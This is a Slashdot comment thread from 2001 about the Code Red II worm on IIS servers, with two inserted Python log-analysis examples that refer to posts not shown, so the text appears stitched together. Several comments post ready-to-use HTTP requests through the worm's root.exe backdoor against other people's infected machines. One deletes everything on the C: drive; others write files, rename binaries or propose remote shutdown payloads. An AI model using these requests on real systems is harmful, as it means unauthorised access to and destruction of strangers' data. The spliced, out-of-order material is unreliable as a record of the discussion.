  34. This probably would do them a favor by eean · · Score: 1

    I've been going to some of the people that are trying to attack me and the majority are not operating. In other words, people who probably completely forget that they even have IIS.

    1. Re:This probably would do them a favor by Lord+Azrael · · Score: 1

      You're right. Since, at least from what I have seen on my server, 70% are behind cable or DSL modems, these are the victims who use Win NT or Win2k for private use only and maybe have never heard of the word patch anyway. It's not the lazy administrators on the boxes where some have not done their homework by applying a 2 month old patch; it really is the stupid Windows user who simply purchased Win2k for private use and does not even know that he has something running called IIS.

      --
      Lord "not Gargamel's Cat!" Azrael
  35. Re:It is the time by Tackhead · · Score: 1
    > you aren't seeing the other because you're vulnerable to them!

    Yeah, I probably should have explained that I was running Apache at the time, which is what made it something to laugh at rather than worry about.

    I didn't see any actual 'sploit attempts from that IP, so either he was a harmless joker with a web browser, or he was changing the GET string based on how the server identified itself. But if he was doing that, why even send a string to an Apache server. So my hunch is he was just a guy who'd drunk too much coffee.

    (Hmm, configure Apache to misidentify itself as an IIS box the next time a worm shows up... lousy web serving idea, but a nice honeypot idea ;-)

  36. Re:The Breaking Point by daveisoverlord · · Score: 1
    Government Intervention. ...What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances

    With no legislation being passed after the massive DDoS attacks last year on EBay, et al - I seriously doubt anything is going to passed now. I thought that situation was the best chance for legislation. Since many of those companies don't make any money unless people can get to their site, I expected them to lobby heavily for some stiff penalties. When big companies stand to lose big money, you usually see laws passed. So if it didn't happen then, I seriously doubt it will happen now.

    --
    The perception of reality is more important than reality itself.
  37. Re:huge cable modem hits by lqx · · Score: 1
    Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)

    Definitely so. Code Red just randomly picks IP addresses to infect, so you'll see it generating ARP requests to actually get to those IPs .. Even if those IPs aren't connected to anything, hence the ARP requests just keep retrying until they timeout and give up.

    Happy Code Worm Day!
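An added example, not code from either poster: a small parser for tcpdump ARP lines like the ones rjamestaylor posted, which counts who-has requests per asking host, how many distinct targets it asked for and how many it had to ask again (a host that answered would be in the ARP cache and not be asked again seconds later), so a gateway ARPing on behalf of scanning hosts stands out from a host resolving one neighbour. The flagging thresholds and the single normal request at the end of the sample are assumptions.

```python
"""Spot scan-driven ARP storms in tcpdump output (added example)."""
import re
from collections import defaultdict

# "HH:MM:SS.usec B arp who-has <target> tell <asker>", as tcpdump prints it
ARP_RE = re.compile(
    r'^(?P<ts>\d\d:\d\d:\d\d\.\d+) B arp who-has (?P<target>\S+) tell (?P<asker>\S+)$'
)

# Assumed thresholds: a host resolving a few neighbours is normal; one fanning
# out to many addresses, a good share of which never answer and get re-asked,
# is relaying traffic aimed at random (mostly unused) addresses nearby.
MIN_DISTINCT = 5
MIN_REPEAT_FRACTION = 0.2


def _seconds(ts):
    """Convert HH:MM:SS.frac to seconds since midnight."""
    h, m, s = ts.split(':')
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_arp(lines):
    """Yield (seconds, target, asker) for each ARP who-has line; skip the rest."""
    for line in lines:
        m = ARP_RE.match(line.strip())
        if m:
            yield _seconds(m.group('ts')), m.group('target'), m.group('asker')


def arp_stats(lines):
    """Per asking host: request count, distinct targets, re-asked requests,
    time span, request rate and a suspicious flag."""
    reqs = defaultdict(list)
    for t, target, asker in parse_arp(lines):
        reqs[asker].append((t, target))
    stats = {}
    for asker, items in reqs.items():
        times = [t for t, _ in items]
        targets = [tg for _, tg in items]
        distinct = len(set(targets))
        repeats = len(targets) - distinct          # asks for an already-asked target
        span = max(times) - min(times)
        rate = len(items) / span if span > 0 else float(len(items))
        stats[asker] = {
            'requests': len(items),
            'distinct': distinct,
            'repeat_requests': repeats,
            'span_s': round(span, 2),
            'rate_per_s': round(rate, 2),
            'suspicious': distinct >= MIN_DISTINCT
                          and repeats / len(items) >= MIN_REPEAT_FRACTION,
        }
    return stats


# Sample: a handful of lines from the capture posted above, plus one
# constructed request from an ordinary host resolving a single neighbour.
SAMPLE_ARP = [
    "19:14:07.770553 B arp who-has 66.74.1.213 tell 66.74.0.1",
    "19:14:08.020553 B arp who-has 66.74.1.184 tell 66.74.0.1",
    "19:14:08.580553 B arp who-has 66.74.1.112 tell 66.74.0.1",
    "19:14:09.320553 B arp who-has 66.74.1.8 tell 66.74.0.1",
    "19:14:09.890553 B arp who-has 66.74.1.253 tell 66.74.0.1",
    "19:14:11.880553 B arp who-has 66.74.1.226 tell 66.74.0.1",
    "19:14:12.270553 B arp who-has 66.74.1.8 tell 66.74.0.1",
    "19:14:15.910553 B arp who-has 66.74.1.253 tell 66.74.0.1",
    "19:14:17.910553 B arp who-has 66.74.1.226 tell 66.74.0.1",
    "19:14:18.230553 B arp who-has 66.74.1.8 tell 66.74.0.1",
    "19:14:18.400553 B arp who-has 66.74.0.50 tell 66.74.0.77",  # constructed
]

if __name__ == '__main__':
    for asker, s in arp_stats(SAMPLE_ARP).items():
        flag = 'SUSPICIOUS' if s['suspicious'] else 'ok'
        print(f"{asker:15s} {s['requests']:3d} req  {s['distinct']:3d} targets  "
              f"{s['repeat_requests']:3d} re-asked  {s['rate_per_s']:5.2f}/s  {flag}")
```

Feed it the output of `tcpdump -n arp` to get the same table for a live segment.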

  38. Re:potential for something worse by Borogove · · Score: 1

    The IIS weakness is found. The CodeRedII System goes on-line August 4th, 2001. Human decisions are removed from strategic hacking. CodeRedII begins to spread at a geometric rate. It becomes self-aware at 2:14AM, Eastern Time, August 29th.

    --
    There has been a major scientific break-in
  39. Re:It's easy to secure your IIS.. by Telek · · Score: 1

    (pardon the caps, but I'm pissed) AND I AM SICK AND TIRED OF EVERYBODY BLAMING MICROSOFT AND THEIR PRODUCTS FOR PROBLEMS THAT ARE NOT ALWAYS THEIR FAULT. Yes yes yes, every software is going to have problems, *nix'es have all had theirs. The problem here lies in the fact that the majority of servers that have been compromised are either (a) small personal-type sites or (b) don't even realize that they are running a server. It's hard to tell people to protect their systems when they don't even think that it's their system that they need to protect. And before you go bashing MS about this one (i.e. that it's installed by default) keep in mind that if the user knew what they were doing, they'd either disable it or would know to secure it. People who use *nix tend to be technosavvy and therefore will be very conscientious about what software they're running and apply the patches at the proper times, whereas W2K admins aren't always "on the ball". But stop blaming Microsoft for everything here.

    --

    If God gave us curiosity
  40. Re:this sucks by aechols · · Score: 1
    yes, it means script kiddies can run their little programs with even more ease. syn floods, stealth searches, etc. the classic attacks like ping of death, teardrop, boink, and friends need a raw socket to make malformed packets. although these are not threats any more, similar holes are bound to appear.

    my point about raw socket support & code red is that a similar worm could appear, one that requires the use of malformed packets to take control of the IIS server/other microsoft product. it would be able to make these malformed packets by utilizing raw sockets

    --
    Are you pondering what I'm pondering?
  41. It is the time by Pat__ · · Score: 1, Redundant

    I think it is about time to write the exploit that will take all those vulnerable IIS servers with an open command shell and remotely patch them once and for all :-)
    At least to get it over with this Code Red thingy!

    On a completely other note! I was thinking it would be nice if the worm copied random text strings (from the victim's hard drive) instead of the XXXXXXXXX in order to overrun the buffer :) Then it would be really interesting to read those log files!

    1. Re:It is the time by Tackhead · · Score: 2
      > On a completely other note! I was thinking it would be nice if the worm copied random text strings (from the victim's hard drive) instead of the XXXXXXXXX in order to overrun the buffer :) Then it would be really interesting to read those log files!

      Well, I haven't seen that yet, but I saw something even funnier:

      999.999.999.999 - - [04/Aug/2001:23:43:18 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXJust_Kidding___Now_How_About_Running_Apache_Instead_of_IIS HTTP/1.0" 404 282 "-" "-"

      (Yes, just some guy with a sense of humor and a web browser, not enough Xs to trigger the overflow ;-)

    2. Re:It is the time by ass1m1l8 · · Score: 1
      On a related note, since most of these new Code Red attacks are relatively local to you, you can helpfully inform people that they've been infected by using "net send".

      Proper syntax: net send "Your system appears to be harbouring the Code Red virus. Please patch your IIS server"

      This should cause a dialogue box to pop up on the target system with your message in it. They have to click on "OK" to get it to go away.

      --
      relatively personable misanthrope, incognito.
    3. Re:It is the time by tstock · · Score: 1

      How about a perl or sh script to:

      parse logfile;
      extract IP's that are infected
      nslookup their domain
      email root@domain form letter

      please email me if anyone did this.

    4. Re:It is the time by FuegoFuerte · · Score: 1

      how do you tell net send what machine to send to? I've been playing with it a bit on my win2k box and can't get any messages to pop up on my screen. I tried `net send 127.0.0.1 "hello"` and got error 2273. ("The message alias could not be found on the network.") I also tried using my netbios name and my NICs IP address, to no avail.

    5. Re:It is the time by p_trinli · · Score: 1

      Naw, man, White Hats should make their counter-virus install the ultimate patch:

      ...Linux (FreeBSD, etc.)

    6. Re:It is the time by cluthu · · Score: 1

      Assuming my hostname was 'bloggs' (it isn't, btw), I run: net send bloggs hello and it'll open up a window. You have to be running the Messenger service for this to work.

  42. Re:Origin of Code Red? by Corrado · · Score: 1

    Code Red is the new cherry flavored Mountain Dew.

    --
    KangarooBox - We make IT simple!
  43. MOD this up (+1 funny) ! by whizzmo · · Score: 1

    (sorry, but I gotta)

    --
    nuclear presidential echelon assassination encryption virulent strain
    Whizzmo
  44. Re:Wasted bandwidth by sqlrob · · Score: 1

    Just cause it's in a EULA doesn't make it enforceable.

  45. Re:huge cable modem hits by interiot · · Score: 2

    If you consider that @Home's acceptable use policy explicitly says that running servers isn't allowed... there are two interesting things to note. First, there are a lot of people running public web servers that @Home just ignores. Another thing is that it probably wouldn't be a problem legally for @Home to minimize the impact of code red by blocking port 80 traffic like they did with port 137, at least temporarily.

  46. The old /scripts/root.exe by Gnight · · Score: 1
    Copying cmd.exe into the /scripts directory to gain access to the system is nothing new.

    One bug in IIS let you (through HTTP requests) access the filesystem and run simple commands (this is very sad). The first thing that a cracker would do is copy cmd.exe into the scripts directory.

    One of the servers at my school got hacked this way. I just had to laugh at the simplicity of the hack.

  47. Re:I'm sorely tempted . . . by Phroggy · · Score: 5, Insightful

    Unfortunately, it doesn't look like the root.exe installed by Code Red has Administrator privileges, which iisreset.exe needs. Or at least, that's my guess, since it isn't working.

    --
    $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
    $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  48. Re:Logging the worm by Amerist+A'Toll · · Score: 1
    Really nice!

    I just got permission to put something up on my work's web page that allows us to track the number of hits by Code Red (and Code Red II) but I haven't had time to put anything so sophisticated together. Bravo.

    Current Code Red Worm Hits Count

    Mind releasing code/information on how you did that one?

    On other fronts, one of my co-workers is informing me that he's getting hundreds of such hits on his boxen sitting on the COX@home network, most of them seem to be originating from other COX@home addresses. I did see some mention that there has been lots of COX activity. I wonder what's the reason for that.

    Amerist A'Toll

    --
    "What are dreams when we are but the dreams of dreamers yet to be born?"
  49. Re:The Breaking Point by Malcontent · · Score: 4, Interesting

    You can't sue MS (they are bigger than the govt practically). But you can probably sue any company which uses IIS and stores your personal data. If that company was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
    Everybody wins.

    --

    War is necrophilia.

  50. Re:Microsoft Internet Pollution - My Server Log! by jeremyp · · Score: 4, Interesting

    There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.

    Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.

    --
    All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
  51. Re:This will put a bandaid on the problem: by Telek · · Score: 1

    actually there isn't a "non executable" flag for windows.... changing the extension is good enough.

    --

    If God gave us curiosity
  52. Wasted bandwidth by peterprior · · Score: 1

    Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software? This thing must have consumed quite a lot of bandwidth, and if you're on a "pay per mb" connection, its going to cost you a lot.

    1. Re:Wasted bandwidth by isorox · · Score: 1

      I mistook the original poster as being a windows server. NO they don't, but the attacking computer's EULA will. You have to sue them. Of course, you don't sue slashdot if your site gets slashdotted, do you?

    2. Re:Wasted bandwidth by isorox · · Score: 2

      Nope, look at your EULA

    3. Re:Wasted bandwidth by NetJunkie · · Score: 1

      Sue your admin. They didn't patch it. Microsoft released a patch in time for the first wave of this.

      You really don't want to start this..just wait until Linux is popular enough to attack. How many default Red Hat servers do you think are out there? A LOT. We had a couple of stock Red Hat 6.1/6.2 boxes at my current work when I started.

    4. Re:Wasted bandwidth by Velox_SwiftFox · · Score: 2
      Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software?
      Nope, look at your EULA

      Microsoft's EULA prohibits me from suing them for bandwidth charges for the stuff their crap throws at my Linux/Apache setup?

      Wow, they must have better lawyers than I thought.

    5. Re:Wasted bandwidth by dbarclay10 · · Score: 2

      Well, the EULA still applies :) You couldn't sue Microsoft, but you could sue the companies whose servers are infected (and hence spamming your box).

      MS has absolutely no liability (legally) in this particular instance. Personally, I think it's gross negligence on their part, and I think some *severe* measures are in order.

      Quite frankly, I don't give a shit that they're a monopoly. My local telephone monopoly is *wonderful*. Very nice, very courteous. As a business owner and a consumer, I'm very happy with them. But Microsoft is just plain mean and negligent.

      Dave

      --

      Barclay family motto:
      Aut agere aut mori.
      (Either action or death.)
    6. Re:Wasted bandwidth by einhverfr · · Score: 2
      Actually, the patch was released in June after the overflow was discovered by eeye.com... Lousy admins did not apply the patch or read the advisory (MS01-033).

      I do think that MS deserves some blame because they have made it insanely easy to administrate an NT box functionally but insanely hard to do so competently. The OS is user friendly but very obfuscatory (note that even Apple never marketed Macintosh as a server, at least not until OS X-- they sold servers running Apple UNIX). How many questions on the MCSE exams covered planning for disaster recovery or planning for internet security (hint: less than one)? Those of us who prefer UNIX do so because it is easier to administrate properly though it requires more knowledge to do basic tasks... The learning curve is constant and does not get as steep as NT's does...

      Microsoft also has a history of poor security programming. For example, the Microsoft implementation of PPTP uses a hash of the user's network password as the encryption key for the session. This does not necessarily make it easy to break into an account, but it does effectively prevent any forward security because your key will not change until your password does... I would not trust them with any critical information or production servers, and that includes IIS.

      Not that it matters really-- if FreeBSD and Linux can gain enough dominance, they can effectively take the money out of the small server OS (fewer than 4 processors) and that would be a major blow to Microsoft and it would prevent them from being able to make billions off that industry...

      --

      LedgerSMB: Open source Accounting/ERP
    7. Re:Wasted bandwidth by MackE · · Score: 1

      Now, I don't think I could sue Microsoft over this and win, but I'll be DAMNED if it's because of a EULA for a product I don't even have. IANAL, but I doubt if 'hold harmless' clauses are an absolute defense.

  53. Re:Origin of Code Red? by ether0 · · Score: 1

    "Code Red" is cherry flavored Mountain Dew

  54. Re:The Breaking Point by beable · · Score: 1
    djbdns is an open source replacement. you get a cash award for finding vulnerabilities in it.
    Big deal. You can't prove that something is secure that way. Suppose you worked out how to crack root using djbdns. Are you going to take the cash prize, or are you going to wait until you can get root on a bank's machine and get some REAL moola?

    Does anybody know what the target will be for this version of Code Red Worm? It'd be pretty funny if it was microsoft.com.
    --
    ...
  55. Re:Someone needs to write by siokaos · · Score: 1

    No, sadly, it would be a very complicated algorithm to parse all the facets of the english language, and find similar ideas. I was using a recursive example, just as that, an example, not being serious.

    --
    http://siokaos.org/
  56. Re:I cant believe... by Telek · · Score: 1

    folders get their dates updated when files in them get updated, so this is not necessarily a new installation...

    --

    If God gave us curiosity
  57. One simple HTTP request that nukes C: by Pilferer · · Score: 1

    The following HTTP request will erase everything on the infected machine's C: drive, which prevents it from attacking more machines, and possibly makes the user consider installing Linux rather than reinstalling WinNT/2K:

    http:// {infected ip here } /scripts/root.exe?/c%20del%20/Q%20/F%20/S%20c:\*.*

    Yeah, I know, it's NASTY, but...

    1. Re:One simple HTTP request that nukes C: by CTho9305 · · Score: 1

      if you're going to nuke them, why not set up apache? just set up whatever long bat file is required (using echo blah >file) and then run it... have it download linux, or get and install apache

    2. Re:One simple HTTP request that nukes C: by Anonymous Coward · · Score: 1, Insightful

      This uncovers an NT problem: you can't erase a file that is in use. The del command will probably abort upon finding the first file that it can't delete.

      I've done this before to myself.

  58. Re:File download script by Troed · · Score: 1
    Using someone's public webserver is illegal?

    You're sending GET requests ..

  59. Re:this sucks by raju1kabir · · Score: 1
    what i don't look forward to is probably an increase in this kind of crap as XP rolls out with raw socket support.

    What on earth does raw socket support have to do with anything discussed here? Do you even know what it means?

    --
    "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  60. This will put a bandaid on the problem: by Telek · · Score: 2, Informative

    try this:

    GET /scripts/root.exe?/c+echo+ren+root.exe+badrootexploit+>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+attrib.exe+root.exe+%u002Br+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+fixme.cmd HTTP/1.0

    This way it renames the old root.exe, creates a new dummy one, and write-protects it so it can't be overwritten by a simple copy command.

    --

    If God gave us curiosity
  61. Re:huge cable modem hits by onepoint · · Score: 2

    I'm having 2 to 4 alerts every minute from the @home network or road runner.

    It's crazy.

    onepoint

    --
    if you see me, smile and say hello.
  62. these will do.. by LinuxHam · · Score: 1

    net stop iiswww

    route delete 0.0.0.0

    (the equivalent of) ifconfig eth0 down

    and I saw something like 'iisreset /y' go by before..

    --
    Intelligent Life on Earth
  63. They deserve it by zexxxx · · Score: 1
    It's really shoddy if different strains of a worm can use the same exploit over a couple of weeks. For the amount of money that is spent in trying to keep computers secure, this is insane.

    I guess most of the hits i've taken are more from home users. Only God knows why anyone would need a server OS for personal use.

    Good ol' linux!

  64. Re:Code Red Infects Slashdot! by Anne_Nonymous · · Score: 1

    Would someone post an actual link to this please. Thx -Anne

  65. Re:potential for something worse by Unknown+Bovine+Group · · Score: 1
    LOL

    GET /SarahConnor.ida?XXXXXXXXXXXXXXX...

    --
    m00.
  66. Microsoft to World: Dont blame us for code red! by spike666 · · Score: 1
    An article pulled from the Philippines Inquirer quotes a Microsoft rep (granted, he's just the Philippines head) as saying that "it is wrong to say that Microsoft software is inherently vulnerable to security threats"

    the article is available on the Hoovernews website

  67. Re:Try pulling the IP up in your browser by cavemanf16 · · Score: 1

    I actually tried this in Konqueror a couple days ago. Didn't have any immediate results, but somehow www.rob.com managed to set a cookie on my Mandrake8 box, which I readily found out was most likely due to my trying to find CodeRed'ed servers that had hit me. Funny thing is, I never received the popup requesting me to allow the cookie when surfing for his IP, and I have Konq set to Ask Permission for every cookie placing attempt. Weird.

  68. Re:Aural Feedback by Brett+Viren · · Score: 1
    Consider using the command

    tail -f log | grep default.ida >crhits.log

    in conjunction with the "select(2)" system call (available in Perl), for improved efficiency.
  69. Bandwidth wasted? by mwillems · · Score: 2
    Wasted? It's like airplane seats: once it's not used, it's gone forever. Not a renewable resource. If a particular pipe is 90% full as opposed to 10% full, there's very little difference.

    So unless it caused noticeable congestion it makes no difference in that respect.

    --

    ---
    BDOS ERR ON A:>
  70. How to be a nice guy by Pilferer · · Score: 1

    If you're a nice guy, try the following (or something similar) to let the victim know they're infected:

    http:// {infected ip here } /scripts/root.exe?/c%20echo%20f>c:\windows\desktop\warning%20you%20have%20the%20code%20red%202%20virus%20your%20computer%20attacked%20mine%20please%20get%20a%20virus%20scanner.txt

    When the victim sees something along the lines of "You've got a virus, you attacked me, go clean your system up!" sitting on their *desktop* they'll * NOTICE * it!

    If you try to run "delete root.exe" you'll get an access denied..

    1. Re:How to be a nice guy by Anonymous Coward · · Score: 1, Insightful

      Too bad WinNT machines don't have a "c:\windows" directory. On NT4 try "c:\winnt\profiles\administrator\desktop" and on Win2k and WinXP try "c:\documents and settings\administrator\desktop". You could also replace administrator in both of those paths with "all users" so that it shows up on the desktop of all users on the system.

  71. Re:I'm sorely tempted . . . by Phroggy · · Score: 1

    I stand corrected. I got it to work on a different server. Only one, though; most of the rest I've tried don't seem to have root.exe installed.

    --
    $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
    $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  72. Re:Aural Feedback by d3jp_ · · Score: 1

    Great, you're making a sound on the newer Code Red variant... What about the old one? I'm still getting about a 4:1 ratio of original code red to anything else... If you don't have a web-server running, but STILL want to log Code Red, use websnarf... A perl implementation to log attempts to access port 80 [ or whatever port you want I guess... ] http://www.unixwiz.net/tools/websnarf.html Yes, it runs under ActivePerl too...

  73. Re:The Whitehouse.gov lesson by beable · · Score: 1

    And now that whitehouse.gov has installed Linux, the Code Red Worm no longer exists, right? And everybody knows that Distributed Denial of Service attacks don't work against Linux boxes, right?

    Mod that sucker back down.

    --
    ...
  74. Re:Sadmind/IIS unicode worm already did that by BCoates · · Score: 1

    Sorry, you're right about that. Different IIS vulnerability (ugh), same sort of backdoor installed.

    Either way, someone who finds a wormed IIS should remember to blow away and reinstall the box (instead of just patching IIS and cleaning up the webroot), since either the vulnerability or the backdoor could have installed who-knows-what on it in the meantime...

    --
    Benjamin Coates

  75. Re:Nasty as it gets? by LinuxHam · · Score: 1

    IANAL,BMSI (But my sister is - Stanford Law, at that!)

    So I asked her if MS could be sued due to the poor quality of their software, and the millions of dollars spent restoring businesses to normal operations. She said that they absolutely cannot be sued for the resulting conditions based upon misuse of their product. Same goes for any product manufacturers.. gun, automobile, kitchen knives, whatever.

    They would have to continue to produce software that was known to contain bugs and major security risks, and here's the key: never release any updates or patches to try to resolve the situation. You have to admit, they've released tons of patches this year alone. They *are* trying to resolve problems as they come up. At least a little bit.

    --
    Intelligent Life on Earth
  76. Re:Repository of infected IP addressen by BMIComp · · Score: 2

    Well, right now a lot of people are sending their logs to Dshield, who then notify the owners of the infected machines.

    grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org
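A fuller version of what NullAndVoid's grep/tr/awk pipeline (comment 30), tstock's wished-for parse-the-logfile script (41.3) and the grep-to-DShield one-liner above all start from, as an added example that is none of the posters' code: it classifies each Apache combined-log line as an original Code Red hit (padding run of N's), a Code Red II hit (X's), a hand-typed default.ida joke like the one Tackhead logged, or a probe for the root.exe backdoor, then tallies hits per source IP and per hour so you can see which neighbours are infected and when the peaks fall. The MIN_PAD threshold and the sample log lines are constructed assumptions.

```python
"""Classify and tally Code Red hits in an Apache access log (added example)."""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache combined log format: ip ident user [ts] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
# Both worms hit /default.ida; the original pads with N, Code Red II with X.
IDA_RE = re.compile(r'^GET /default\.ida\?(?P<pad>[NX]*)')
# A request for root.exe (the copied cmd.exe) or cmd.exe itself is someone
# trying the backdoor the thread describes, not the overflow.
BACKDOOR_RE = re.compile(r'^GET \S*/(?:root|cmd)\.exe', re.I)
# Assumption: a real worm request carries a padding run of a few hundred
# characters; anything much shorter was typed by hand (like the joke above).
MIN_PAD = 200


def classify(line):
    """Return (ip, timestamp, kind) for one log line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
    req = m.group('req')
    kind = 'other'
    ida = IDA_RE.match(req)
    if ida:
        pad = ida.group('pad')
        if len(pad) < MIN_PAD:
            kind = 'ida-probe'
        elif pad.count('N') >= pad.count('X'):
            kind = 'codered1'
        else:
            kind = 'codered2'
    elif BACKDOOR_RE.match(req):
        kind = 'backdoor'
    return m.group('ip'), ts, kind


def extract(lines):
    """IP, timestamp and kind of every worm/backdoor hit (the awk fields, plus kind)."""
    out = []
    for line in lines:
        hit = classify(line)
        if hit and hit[2] != 'other':
            ip, ts, kind = hit
            out.append(f"{ip} {ts:%d/%b/%Y:%H:%M:%S %z} {kind}")
    return out


def summarize(lines):
    """Hits per source IP broken down by kind, plus hits per hour of day."""
    by_ip = defaultdict(Counter)
    by_hour = Counter()
    for line in lines:
        hit = classify(line)
        if hit is None or hit[2] == 'other':
            continue
        ip, ts, kind = hit
        by_ip[ip][kind] += 1
        by_hour[ts.hour] += 1      # hour in the log's own timezone
    return by_ip, by_hour


def report(lines):
    """One line per source IP, busiest first, then an hourly histogram line."""
    by_ip, by_hour = summarize(lines)
    rows = sorted(by_ip.items(), key=lambda kv: -sum(kv[1].values()))
    out = [f"{ip:15s} " + " ".join(f"{k}={n}" for k, n in sorted(c.items()))
           for ip, c in rows]
    out.append("per hour: " + " ".join(f"{h:02d}h={n}" for h, n in sorted(by_hour.items())))
    return out


# Constructed sample lines (private / documentation addresses) in the same
# shape as the real ones the posters grep.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Aug/2001:13:02:11 -0600] "GET /default.ida?' + 'N' * 224
    + ' HTTP/1.0" 404 282 "-" "-"',
    '10.0.0.7 - - [04/Aug/2001:13:40:00 -0600] "GET /default.ida?' + 'X' * 224
    + ' HTTP/1.0" 404 282 "-" "-"',
    '10.0.0.7 - - [04/Aug/2001:14:01:00 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '192.0.2.9 - - [04/Aug/2001:23:43:18 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXX'
    'Just_Kidding___Now_How_About_Running_Apache_Instead_of_IIS HTTP/1.0" 404 282 "-" "-"',
    '10.0.0.5 - - [04/Aug/2001:13:05:00 -0600] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    print("\n".join(report(SAMPLE_LOG)))
```

Pipe a real access_log through `report(sys.stdin)` to get the same table for your own server.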

  77. Re:Now that I've got access to hundreds of boxes by Hilary+Rosen · · Score: 2

    I get this. I think it means IIS is running on a desktop version of Windows (NT4WKS or W2KPro) rather than a server.

    ===

    The page cannot be displayed

    There are too many people accessing the Web site at this time.

    ---

    Please try the following:

    Click the Refresh button, or try again later.

    Open the 65.29.102.77 home page, and then look for links to the information you want.

    HTTP 403.9 - Access Forbidden: Too many users are connected

    Internet Information Services

    ---

    Technical Information (for support personnel)

    Background:

    This error can occur if the Web server is busy and cannot process your request due to heavy traffic.

    More information:

    Microsoft Support



    --
    Yes, the nick is flamebait
  78. Re:Origin of Code Red? by jstockdale · · Score: 1

    South Island, but no sorry, try the extreme sports capital of NZ ;) and no we don't get Mountain Dew here. We do however get Dr. Pepper imported from the States so go figure.

    --
    **AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
  79. Re:My prediction... by JimPooley · · Score: 1

    Three more versions surely..

    LLLLLL...
    IIIII....
    and
    UUUUUU...

    What's that spell!!!

    --

    "Information wants to be paid"
  80. Re:I'm sorely tempted . . . by IdentityCrisis · · Score: 1

    ummn, I think that in NT you have to change the number to hex meaning instead of 1 you'd use 0x1

  81. How does codeRed infest? by Umanity · · Score: 1

    I understand that this worm exploits the buffer overflow bug in IIS. Has anybody disassembled the program to understand how it operates? If so, please contact me...

    I have determined that if we could insert a payload on a codeRed terminator, we could shut down the infested machine by calling the winAPI function:

    ExitWindowsEx(EWX_POWEROFF)

    This should work, assuming the process has SE_SHUTDOWN_NAME privileges. I don't have IIS, but I am looking at MSDN on a Win2000 machine now.

    I would like to understand the payload, it seems like a sequence of unsigned integers. They occur just past the stack, so when the function exits it returns to the inserted code. If we could insert the call to ExitWindowsEx() we would be HOME FREE!

    Contact me @ michaeluman@softwaremagic.net

    --

    Michael A. Uman
    Sr Software Engineer
    softwaremagic.net

  82. Re:CmdrTaco runs Windows by mpe · · Score: 2

    I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)

    Except that the strange HTTP requests it puts out cause problems with some embedded webservers...

  83. Re:The Breaking Point by Ridge2001 · · Score: 3, Insightful
    Does anybody remember a few months ago when everybody around Slashdot was feeling sorry for themselves because it seemed that Open Source software was getting hard hit by security problems?
    • sourceforge.com was hacked
    • themes.org was hacked
    • apache.org was hacked
    • the ramen worm
    • the lion worm
    • the knark rootkit
    Things were so bad that Microsoft felt cocky enough to make claim that open source software has "inherent security risks".

    Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?

    Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.

  84. Re:huge cable modem hits by Siberius · · Score: 1

    Mine too has my ADSL modem light up like a christmas tree. Even with my computers unplugged the adsl light keeps flickering. Is there any way to stop this?

  85. Re:CmdrTaco runs Windows by M.+Silver · · Score: 2
    Except that the strange HTTP requests it puts out cause problems with some embedded webservers

    Yabbut that's *still* not "all of us," as with SirCam.

    Though, interestingly enough, I haven't seen SirCam. I run a mailing list server, and usually I get a nice sampling of darn near everything caught in the spamtrap... I saw Melissa from a European subscriber way in the wee hours of the morning, which was handy since my then-employer needed a sample to feed to its mail filter. And I still see Snowhite once every couple of days. But no SirCam.

    Not that I'm complaining, mind you...

    --

    Slashdot's token middle-aged housewife
  86. Re:I'm sorely tempted . . . by Magius_AR · · Score: 1
